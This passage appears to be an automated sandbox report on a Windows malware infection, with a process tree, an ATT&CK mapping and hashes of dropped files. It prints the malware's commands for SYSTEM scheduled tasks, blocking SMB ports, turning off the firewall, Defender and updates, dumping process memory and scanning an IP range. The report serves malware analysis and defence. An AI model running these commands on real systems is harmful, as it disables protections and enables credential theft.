- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:940
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3080
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1400
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3844
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2132
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3044
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1628
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4420
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2268
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3432
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4732
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1324
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:452
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3620
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 780 C:\Windows\TEMP\itcctjlje\780.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4800
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2472
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:1692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:3976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4500
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4708
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:724
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:3952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4588
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1556
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:3028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1400
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5024
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:4232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2832
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1804
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1344
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:2196
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2016
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 64 C:\Windows\TEMP\itcctjlje\64.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2580
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2148 C:\Windows\TEMP\itcctjlje\2148.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4832
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2740 C:\Windows\TEMP\itcctjlje\2740.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2792 C:\Windows\TEMP\itcctjlje\2792.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3240
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2260 C:\Windows\TEMP\itcctjlje\2260.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 1284 C:\Windows\TEMP\itcctjlje\1284.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2364
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3772 C:\Windows\TEMP\itcctjlje\3772.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4736
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3860 C:\Windows\TEMP\itcctjlje\3860.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3932 C:\Windows\TEMP\itcctjlje\3932.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1384
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 4056 C:\Windows\TEMP\itcctjlje\4056.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5084
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 1936 C:\Windows\TEMP\itcctjlje\1936.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3836
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2360 C:\Windows\TEMP\itcctjlje\2360.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2984
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 5088 C:\Windows\TEMP\itcctjlje\5088.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4548
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3120 C:\Windows\TEMP\itcctjlje\3120.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4368
- C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3956 C:\Windows\TEMP\itcctjlje\3956.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\itcctjlje\unptrtjvi\scan.bat
  2⤵
  PID:884
- - C:\Windows\itcctjlje\unptrtjvi\midctcinn.exe
    midctcinn.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2396
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5584
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5684

C:\Windows\SysWOW64\gyggue.exe
C:\Windows\SysWOW64\gyggue.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1172

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F
1⤵
PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4048
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F
  2⤵
  PID:4504

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F
1⤵
PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1700
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F
  2⤵
  PID:4276

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tmyfwky.exe
1⤵
PID:2472
- C:\Windows\ime\tmyfwky.exe
  C:\Windows\ime\tmyfwky.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1188

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F
1⤵
PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1056
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F
  2⤵
  PID:2484

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F
1⤵
PID:4408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1600
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F
  2⤵
  PID:5948

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tmyfwky.exe
1⤵
PID:6008
- C:\Windows\ime\tmyfwky.exe
  C:\Windows\ime\tmyfwky.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\dvfzrticv\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\itcctjlje\1284.dmp

Filesize
810KB

MD5
9700fd34cf966d7b3cdf0d9bfd439564

SHA1
030975865edf1f4ebc2702eda673ed807d3d8c83

SHA256
f00c137ae397840bc9dbaa2fe64ff7a07ccfff837ef9f9e37797aa67347fa591

SHA512
d0e34d7498bb4508188379e4935b0b2125f450d9fa52dca6d6feabba86a19f1505be5bfcecb2670a5909f14d035961298c79c18ea1d6f6d2c11574f22aa728d9

Download Submit
C:\Windows\TEMP\itcctjlje\1936.dmp

Filesize
1.2MB

MD5
456e545a57da17250a49438a441e9e19

SHA1
160a3b4f07ae3c090b9d6756ce49c351ff49a2ca

SHA256
1b238ffb16ef411bd9c3f5bd626b3e930b746a998499a9aa3d026e044a6708be

SHA512
5a708545ff82ffc522fd3c7bf63d56508078751fde5e489a95e8f27fcf1c6be177de83e20b82de3f6aa87d5cb61910b1128516322b4a13d93bced0ee13ad0e60

Download Submit
C:\Windows\TEMP\itcctjlje\2148.dmp

Filesize
4.1MB

MD5
7bd110eb29f09573eb832ed1a58ea4a5

SHA1
859730b66343a7b56f96738d08f8e232a88eea4e

SHA256
b9b60e0f40533eecf02c98470a7cdeaa8b1893b6024c5230d86b25deb3082713

SHA512
f1a4e52ceaf59fac463d329ee6ff6616b0f3f22252c8638a8b4f29de580f915e80f22af7db5b1c0e9acb7d8d98ac1090f78ce7430a0763a3a191a29b5aa23771

Download Submit
C:\Windows\TEMP\itcctjlje\2260.dmp

Filesize
2.9MB

MD5
8636b8d87d8c644345fc7263fadd2c24

SHA1
94306fbc16f79e1996f78c3db8b2a78e1c59a991

SHA256
2a9936ef3b3687981cce3c2664d246be1711a8fd8f85876b110511ceb02d4f24

SHA512
b2026f17690a0a725ff3d4cc6fd5be1e6a7d250a4338db0a43aad27168f25e4d719e2c40f44c5c87358fdc2f78675cfcee56220d853c2966aff3a6649963181a

Download Submit
C:\Windows\TEMP\itcctjlje\2360.dmp

Filesize
25.9MB

MD5
27037f311f54d411bb97ea4621e9a554

SHA1
598e5df8191f17c1860b4d4e622fef0bb3159a66

SHA256
a5766e2024c2674ecd1608aeb6bca4f0afbc5e84777dbb321b6d307e34fb0a18

SHA512
9c379eb7e43679a2646fadee8cebe0c5f8fd77d32b65e02aac75c4f7651e0083d2a5b3b9e710470ed03596418a2c17737917b1b6990f005847916108adacbabb

Download Submit
C:\Windows\TEMP\itcctjlje\2740.dmp

Filesize
7.5MB

MD5
1254a474a3a1a0735925fc666d62707a

SHA1
0a931352d631ed7d0d982152f7b658c71e10e4d5

SHA256
b95b9ed8593fde0de37a0f1d64fba68b846fa32b2510583e7b02553ca1612116

SHA512
5be54e3311f6ca00d222470b87adcc9873a95f55ed176830e7497a44164e45ac90237c9d0b3f55596c49e0420adce8e2464b4355a99f1d0e1f20e80df222fae4

Download Submit
C:\Windows\TEMP\itcctjlje\2792.dmp

Filesize
3.8MB

MD5
7f0dab68a8027828840ac58ca3b4d6ce

SHA1
140410c3c5ee7e3912e418493c6fb79dfc53a92a

SHA256
45a5b2cb60d415ad81077854e02bb0a6f57a9ada50892185183d29292dc8a422

SHA512
3e81ae12a62281344aa421f8c63cf319e7c97aa9d767127a4189a42e8efe4006b9e7e232a31a6bf9cd1648731eb67005da54069f957172b24e5dbd3d72fcf51f

Download Submit
C:\Windows\TEMP\itcctjlje\3120.dmp

Filesize
2.7MB

MD5
24df7b9619d3b3f1b0aa252e942f1af3

SHA1
0beeb94798ed2baa4699ec4e79be2cce328efc01

SHA256
e7bc52792a56597a9f49eabc32ab71d3379d11dcfd0d58ce129c6cf226330f8d

SHA512
1796bc2ae50179112d9ce0e4ad7623bbbfe02bcc42e03723fab801b9d9ce472a71fa1f448eed1988b43d94574f347b6a2e2a23b2488fd1776ceb751b3512e373

Download Submit
C:\Windows\TEMP\itcctjlje\3772.dmp

Filesize
2.4MB

MD5
9a771cf56b16a5a3ae7df20d072d01d3

SHA1
61e062b8c201e276826a3ddcb4a7c1ccdb16696c

SHA256
a9235432904dd41db02e67dd5bdc88762cc35c9e01f7087ab628685ed25bde49

SHA512
653e31ada4d8761542d782c41676ef233cd7abed8c425c8e8f56e19e2ab872bf4d04e112c71c47ef1aec19f9cb9517540010f487ee46a5aee3c250e4a0446056

Download Submit
C:\Windows\TEMP\itcctjlje\3860.dmp

Filesize
20.5MB

MD5
38bbcb83f18a9badec18306e2e24339c

SHA1
708805812ed88839117939f120fbe41d5f88760e

SHA256
06d5d98eaace9d80f2d50fc5f79af6b0b52b2e036f8cb79c817f18acfdfbde24

SHA512
0c8c1441b56f62c1c9bdb929dbf859f0d031ba75a27bcc8bb62475c53673884262323282feab9ac086ebedb6041cd93a4ca7ec043d242111e6316747d3347e7b

Download Submit
C:\Windows\TEMP\itcctjlje\3932.dmp

Filesize
4.2MB

MD5
ae2cbeca1a9ca633c5d1e8595d5bf600

SHA1
68d1dd51c48d3463cb411898d0b46f48e274cc36

SHA256
24530a8890245a9bf520786d94264674adcc601f443ba9d5a764f66765bfdd4e

SHA512
e1e98f1b4854ba26937a4f27e016f7c0174c26dd66f8840d8786fcaca0f508d531f144fe2ab093ef47cf602538ad8c65d9403d1de23dc3e08b08a0ee2f4fa111

Download Submit
C:\Windows\TEMP\itcctjlje\4056.dmp

Filesize
44.1MB

MD5
ad1965374cfad911b0242a2fac8252a1

SHA1
00aef039c5079ed00e2976125a5095e6aa27f996

SHA256
1a9e316e06c398287e044b20859bb41bf457bcaec6596ade0559a08d5d07236d

SHA512
2ce841e20284232b24d038209cd7f788ca73d6f52f7fa91a52ac9d0a1df8f731fe5cd59eed38a7cb186cf8530b3407c346e4f804ac508030616daad3dbfc4ec3

Download Submit
C:\Windows\TEMP\itcctjlje\5088.dmp

Filesize
8.7MB

MD5
3449c3481f0ffb3aaae477f6345d5385

SHA1
bf0a581ee943616b513ecc8f673584f8f72867c4

SHA256
db8d0c488f1d16a08e2a8863431303ca7f097d1b66cd1ecd4d1b97d2383343fe

SHA512
896649404fd5292c5dd39abf2929b86a45f180efc3cf44ae5a77de6a0fbcea17561500e92ee53fa1a48e713151e2935c449d66698fb871b22dd8e6faea5eab76

Download Submit
C:\Windows\TEMP\itcctjlje\64.dmp

Filesize
33.5MB

MD5
57581a1d373ebcdc3ea096b3e6152b06

SHA1
08f655d83811970d626392a1b32b427e4cea00f6

SHA256
1ae1cbebb1c8a3129d85011166d6aa317f62124deed65fec3005928120d85d96

SHA512
3d447b63d7be97777bfe4f7efc86878e2d331fae9e3f1f037b306217a0f39529c86030bca6cc268c98086694cc7e54aff3625f144c97282f1fe1218181045691

Download Submit
C:\Windows\TEMP\itcctjlje\780.dmp

Filesize
1019KB

MD5
e356d846b676cfdbf5ac6b68dd2ad216

SHA1
6f22068bc7bd4787482fcebe6c1566ad9258aa1f

SHA256
12a2da6047203bde30a09db30961c35d46c485962e09854d1098b0de6d23d888

SHA512
45a1f4c2e79745c17e7931d9532c37ea2e213026442f0e316e40b0d0ba09811a0836483ee9c594012a50a04c418f43abfca10eadc6e2523c8b3fabcdae3c3c2d

Download Submit
C:\Windows\Temp\dvfzrticv\lfbpkn.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\itcctjlje\cmzbnyytn.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nshD8DD.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nshD8DD.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
